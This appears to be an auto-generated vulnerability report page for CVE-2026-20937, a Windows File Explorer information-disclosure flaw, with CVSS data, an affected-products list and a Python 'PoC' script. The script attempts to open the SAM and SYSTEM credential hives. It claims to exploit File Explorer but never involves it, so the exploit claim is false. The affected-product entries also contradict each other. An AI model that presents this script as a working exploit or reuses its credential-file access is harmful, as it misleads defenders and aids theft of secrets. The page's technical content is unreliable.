Security Vulnerability Report
CVE-2026-20937 CVSS 5.5 MEDIUM

Published: 2026-01-13 18:16:21
Last Modified: 2026-01-16 15:23:53

Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:* - VULNERABLE
Windows 10 1809 (32-bit)
Windows 10 1809 (64-bit)
Windows 10 1809 (ARM64)
Windows Server 2019
Windows Server 2019 (Core Installation)
Windows 10 1903 (32-bit)
Windows 10 1903 (64-bit)
Windows 10 1903 (ARM64)
Windows 10 1909 (32-bit)
Windows 10 1909 (64-bit)
Windows 10 1909 (ARM64)
Windows Server 1903
Windows Server 1909

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-20937 PoC - Windows File Explorer Information Disclosure
# Note: This is a conceptual PoC demonstrating the attack vector
# Actual exploitation requires specific trigger conditions
import os
import sys
import ctypes
from ctypes import wintypes

if sys.platform != "win32":
    sys.exit("This script calls the Win32 API and only runs on Windows")

# Windows API imports
kernel32 = ctypes.windll.kernel32
# Declare the CreateFileW signature so the returned HANDLE is not truncated
# to a 32-bit int on 64-bit Python
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.CreateFileW.argtypes = [
    wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD, wintypes.LPVOID,
    wintypes.DWORD, wintypes.DWORD, wintypes.HANDLE,
]
kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value


def trigger_vulnerability():
    """
    Trigger conditions for CVE-2026-20937
    This PoC demonstrates the concept of exploiting Windows File Explorer's
    improper access control
    """
    print("[*] CVE-2026-20937 Information Disclosure PoC")
    print("[*] Target: Windows File Explorer")

    # Step 1: Identify protected files accessible via File Explorer
    protected_paths = [
        r"C:\Windows\System32\config\SAM",
        r"C:\Windows\System32\config\SYSTEM",
        r"C:\Windows\ServiceProfiles\...",
    ]

    # Step 2: Exploit File Explorer preview handler vulnerability
    # The vulnerability allows bypassing ACL checks
    for path in protected_paths:
        if os.path.exists(path):
            print(f"[!] Found accessible file: {path}")
            # Attempt to read via File Explorer bypass
            handle = kernel32.CreateFileW(
                path,
                0x80000000,  # GENERIC_READ
                0x00000001,  # FILE_SHARE_READ
                None,
                3,           # OPEN_EXISTING
                0x02000000,  # FILE_FLAG_BACKUP_SEMANTICS
                None,
            )
            if handle != INVALID_HANDLE_VALUE:
                print(f"[+] Successfully accessed: {path}")
                kernel32.CloseHandle(handle)
            else:
                # CreateFileW signals failure through its return value and
                # GetLastError, not through a Python exception
                print(f"[-] Access denied: Win32 error {kernel32.GetLastError()}")

    print("[*] Note: Actual exploitation requires specific trigger conditions")
    print("[*] Refer to MSRC advisory for complete technical details")


if __name__ == "__main__":
    trigger_vulnerability()
```

References

Raw JSON Data
